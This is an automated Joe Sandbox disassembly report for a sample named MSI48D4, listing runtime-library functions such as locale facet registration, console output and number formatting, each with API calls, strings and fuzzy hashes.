Opcode Fuzzy Hash: dd2b48b13f32ecc2b4840fcf844224afccfb466ba15ed10c43321899af57c519
Instruction Fuzzy Hash: 9001C075A001299BCB14EBA0E8167BE77B1AF84320F240549E4117B2D2DF709E41AB91

Function 00C22BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22BBC
std::_Lockit::_Lockit.LIBCPMT ref: 00C22BC6

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22C17
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22C37

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 09190174b8c01d7e7c9a9e28a7a555f51c4c94b93f5476c1b487e74fba1d48f8
Instruction ID: 9e2365b8cd59418a48ecc6da28313954f91044c853b7d333ab8485856462e153
Opcode Fuzzy Hash: 09190174b8c01d7e7c9a9e28a7a555f51c4c94b93f5476c1b487e74fba1d48f8
Instruction Fuzzy Hash: 0D01D275A00269DBCB28EBA4E8117AE7771BF84310F25450AF4116B292CF749E44EB91

Function 00C22CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22CE6
std::_Lockit::_Lockit.LIBCPMT ref: 00C22CF0

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22D41
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22D61

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 7a373c451021ffe687639c97c7902e743219b41936afee18ee563c79c15c622a
Instruction ID: adeedc95132989b75e12c7d68c192725f544469abb9210876099ef032b2bc213
Opcode Fuzzy Hash: 7a373c451021ffe687639c97c7902e743219b41936afee18ee563c79c15c622a
Instruction Fuzzy Hash: 9501D275900229EFCB15EB60E851BBE7771BF84710F240509F4117B292DF709E45E791

Function 00C22C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22C51
std::_Lockit::_Lockit.LIBCPMT ref: 00C22C5B

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22CAC
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22CCC

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: b58775aebee528196ee2aa6ccbc6424e7f762ad4ca1a964882ea6a84d0a0238b
Instruction ID: f8e3ace22a45e4c9cfa108f2f22b0d8312b92dffd63997f667c26d8fd280e4b0
Opcode Fuzzy Hash: b58775aebee528196ee2aa6ccbc6424e7f762ad4ca1a964882ea6a84d0a0238b
Instruction Fuzzy Hash: 37012275900229DBCB28EBA4E8017BE77B1AF84310F250409F4116B282CF709E40AB91

Function 00C2EC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2EC5D
std::_Lockit::_Lockit.LIBCPMT ref: 00C2EC67

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C2ECB8
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2ECD8

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: d14ea94bfcffb5c419d815deae979383090c43f395235782265be9aaf9a651f9
Instruction ID: c49e43cd9072ab40da5d2848da56b0b053e6d15b7560613a0f23c82965cf7170
Opcode Fuzzy Hash: d14ea94bfcffb5c419d815deae979383090c43f395235782265be9aaf9a651f9
Instruction Fuzzy Hash: C401D275E00129DBCB15EBA4E8517BE7771BF84320F240509F4127B292DF709E41E791

Function 00C22E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22EA5
std::_Lockit::_Lockit.LIBCPMT ref: 00C22EAF

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22F00
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22F20

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 988e25e9cb149b61c6a6b7982e473ebcb7e7258e3928e815dd6bbb851950ee10
Instruction ID: 77900c9390678b733cdfb08aac91003be5e202b57908d977482a00f0e89978e6
Opcode Fuzzy Hash: 988e25e9cb149b61c6a6b7982e473ebcb7e7258e3928e815dd6bbb851950ee10
Instruction Fuzzy Hash: 8D01F576900139EFCB15EBA4E9117BE7771BF84310F250509F4116B292CF709E45EB91

Function 00C22E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22E10
std::_Lockit::_Lockit.LIBCPMT ref: 00C22E1A

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22E6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22E8B

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 097b63b17671a2dd73a5b3286bb9848937678f7a62e9a0212ab9ce634aa39b1f
Instruction ID: b271fedb85b19b00077eda0e262eefa68bbdde1abab4b89268c8f8acde10637e
Opcode Fuzzy Hash: 097b63b17671a2dd73a5b3286bb9848937678f7a62e9a0212ab9ce634aa39b1f
Instruction Fuzzy Hash: 7901F576900129EFCB14EB64E8117BEB7B1BF94711F250909F8216B2A2DF709E84F791

Function 00C22F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22F3A
std::_Lockit::_Lockit.LIBCPMT ref: 00C22F44

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

std::_Facet_Register.LIBCPMT ref: 00C22F95
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22FB5

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: fc9b90681f721721a80ef92dae4540403404ba28f6319f1cdebe8e2a6bc322a7
Instruction ID: bc46fc0930f35a349e9e511d66122dcb509ee4bbf1f38ad9d85df6613ee62bc5
Opcode Fuzzy Hash: fc9b90681f721721a80ef92dae4540403404ba28f6319f1cdebe8e2a6bc322a7
Instruction Fuzzy Hash: 0401F575A00135EFCB14EBA0E9117BEB7B5BF88710F240909F4116B292DF709E80EB91

Function 00C53686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00C53053,?,00000001,?,?,?,00C52198,?,?,00000000), ref: 00C5369D
GetLastError.KERNEL32(?,00C53053,?,00000001,?,?,?,00C52198,?,?,00000000,?,?,?,00C5271F,?), ref: 00C536A9

Part of subcall function 00C5366F: CloseHandle.KERNEL32(FFFFFFFE,00C536B9,?,00C53053,?,00000001,?,?,?,00C52198,?,?,00000000,?,?), ref: 00C5367F

___initconout.LIBCMT ref: 00C536B9

Part of subcall function 00C53631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C53660,00C53040,?,?,00C52198,?,?,00000000,?), ref: 00C53644

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00C53053,?,00000001,?,?,?,00C52198,?,?,00000000,?), ref: 00C536CE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0c80d2a7f7d90423713591b0d6f372a7766ad922566c49a3d296efe23054c3d0
Instruction ID: 75bc052246e376b82239060050ead8ac154a9b072b5d842edef13ccdc6f85d5a
Opcode Fuzzy Hash: 0c80d2a7f7d90423713591b0d6f372a7766ad922566c49a3d296efe23054c3d0
Instruction Fuzzy Hash: 6BF0373A504298BBCF621FD5EC05B9D3F66FF443E2B004554FE199A230CA3189A0EB94

Function 00C32D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00C32CBD,00000064), ref: 00C32D43
LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,00C32CBD,00000064,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32D4D
WaitForSingleObjectEx.KERNEL32(?,00000000,?,00C32CBD,00000064,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32D5E
EnterCriticalSection.KERNEL32(00C6DD3C,?,00C32CBD,00000064,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32D65

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: f2f4d7eafd1f9deb366467062cfc4baa5d4708614f6ff203a55b47bd5edb8336
Instruction ID: fc5d5815e0d018b9179159461544c596f6cf8a18e94cd442d33ba5dc401ad412
Opcode Fuzzy Hash: f2f4d7eafd1f9deb366467062cfc4baa5d4708614f6ff203a55b47bd5edb8336
Instruction Fuzzy Hash: ECE01236B55624BBCF223B55FC08B9E3F29EF49B52F010161F60B76171CA615990CBE1

Function 00C1EC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C1EC8E

Part of subcall function 00C1D87C: __EH_prolog3.LIBCMT ref: 00C1D883
Part of subcall function 00C1D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00C1D88D
Part of subcall function 00C1D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1D8FE

_Find_elem.LIBCPMT ref: 00C1EE8A

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00C1ECF6

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: ef887ac9422a554215c932d34be9e80fc5d767b8c87c6d008b00f0545ee9beb9
Instruction ID: 16a30c8aac02e3d5be1aba0963339c133d96d3e41cfbb7f2a57aff1a2b2da4db
Opcode Fuzzy Hash: ef887ac9422a554215c932d34be9e80fc5d767b8c87c6d008b00f0545ee9beb9
Instruction Fuzzy Hash: 12C16234E042988EDF15DBA4D5507ECBBB1AF57300F284069EC95AB287C7309EC6EB50

Function 00C262BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C262C8

Part of subcall function 00C22D74: __EH_prolog3.LIBCMT ref: 00C22D7B
Part of subcall function 00C22D74: std::_Lockit::_Lockit.LIBCPMT ref: 00C22D85
Part of subcall function 00C22D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00C22DF6

_Find_elem.LIBCPMT ref: 00C26502

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00C2633F

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: 6023299fa84888e50eef44cebe7c7ea06e49ab34dde626be5e44cbfc13b3094d
Instruction ID: 2585ac2910a84ed0dc7c1f625161be31989a1242d594d1482ca4b18d8a8d92ae
Opcode Fuzzy Hash: 6023299fa84888e50eef44cebe7c7ea06e49ab34dde626be5e44cbfc13b3094d
Instruction Fuzzy Hash: 12C1B570E042788BDF21DF64E8417ECBBB1BF11304F5440A9E895AB686DB349D85DB60

Function 00C26694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2669E

Part of subcall function 00C1B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00C1B8DD
Part of subcall function 00C1B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00C1B900
Part of subcall function 00C1B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B928
Part of subcall function 00C1B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B9B7

_Find_elem.LIBCPMT ref: 00C268D8

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00C26715

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 3042121994-2799312399
Opcode ID: f47e4d7d09017c3dd1f7e5399d035ea1e8a60bfd5167ed0c3cace5dc4559f504
Instruction ID: 6c74f93f9a1eed2f6c85bf10bf5749afc625724b4d5b3e50a32e5424b193395c
Opcode Fuzzy Hash: f47e4d7d09017c3dd1f7e5399d035ea1e8a60bfd5167ed0c3cace5dc4559f504
Instruction Fuzzy Hash: ACC19330E042788FDF25EF64E8917ECBBB2BF11304F548099E8956B682DB349D85DB60

Function 00C41A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C41AFD

Strings

pow, xrefs: 00C41AD5, 00C41AF2

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b2650b583f3c97b383b0f2914930b6e8da75d32afcf9ee73205737c0ce6d72d6
Instruction ID: 2dcd1bb4fc7de690a115fb4548be3ea360727917a7373203182d0217f54d8fec
Opcode Fuzzy Hash: b2650b583f3c97b383b0f2914930b6e8da75d32afcf9ee73205737c0ce6d72d6
Instruction Fuzzy Hash: A0517AA1A89302CACB117B14CD4137E7BA0FB40751F284958E8E6822F9FF31CDD5AA47

Function 00C31E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C31FD1

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00C31F2F, 00C31F66, 00C31F6B
-, xrefs: 00C31FFF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 63864565c1a6f52996dba6cf0868bc7aa8a5cf09c21810a5f15295a3f970c4ca
Instruction ID: a7eebca991115abde6744f16c6572ce74c2de5812b9c06a8577ca8e1ad95445a
Opcode Fuzzy Hash: 63864565c1a6f52996dba6cf0868bc7aa8a5cf09c21810a5f15295a3f970c4ca
Instruction Fuzzy Hash: 39511570B242859FDF298FAD84857BEBBF96F0A340F18405AECA1D7241C3759A45CB61

Function 00C1BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00C1BF6E

Strings

false, xrefs: 00C1BE95
true, xrefs: 00C1BEAB

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: f0d1dd435c17d305b888794df0701088f8863f821d810d76ac1f7bc4c9b2b1a1
Instruction ID: e17ad8055e3be425a1f4000b9aadafc42f59dc3a9e30963ef38018aa72c525e3
Opcode Fuzzy Hash: f0d1dd435c17d305b888794df0701088f8863f821d810d76ac1f7bc4c9b2b1a1
Instruction Fuzzy Hash: D251B5B5D00748DFDB10DFA4C841BEEB7B8FF05304F14426AE845A7641E774AA85DB51

Function 00C170A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00C171E3, 00C17210
\\?\UNC\, xrefs: 00C17173, 00C171CE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: 093d28748f991c138df99d1ad2811ffd510738a941790d0688ec698e410a50ff
Instruction ID: 634301ac21520b5e7a11a15f949a8e0dffebc4af0331638f5e6dfcc2a2ace18e
Opcode Fuzzy Hash: 093d28748f991c138df99d1ad2811ffd510738a941790d0688ec698e410a50ff
Instruction Fuzzy Hash: E951E170A14204EBDF24CF64C885BEEB7B5FF4A704F24461DE806A7281DBB56AC5DB90

Function 00C2D4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2D501
_swprintf.LIBCMT ref: 00C2D573

Part of subcall function 00C2254E: __EH_prolog3.LIBCMT ref: 00C22555
Part of subcall function 00C2254E: std::_Lockit::_Lockit.LIBCPMT ref: 00C2255F
Part of subcall function 00C2254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C225D0

Part of subcall function 00C22FC8: __EH_prolog3.LIBCMT ref: 00C22FCF

Strings

%.0Lf, xrefs: 00C2D56B

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
String ID: %.0Lf
API String ID: 3050236999-1402515088
Opcode ID: d1d22c53a8e6aefcb141d8f2f8220a9abc9ed4ebea18df12a4670b36ca89d0c1
Instruction ID: 378c6b43245ecb536149f1dbb69d94e76748b48160b4813db363e6fa4722fc76
Opcode Fuzzy Hash: d1d22c53a8e6aefcb141d8f2f8220a9abc9ed4ebea18df12a4670b36ca89d0c1
Instruction Fuzzy Hash: 854168B1E00318ABCF05EFE0D845ADD7BB5FB18300F208559F846AB291EB759955DF90

Function 00C2D79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON

Download Yara Rule

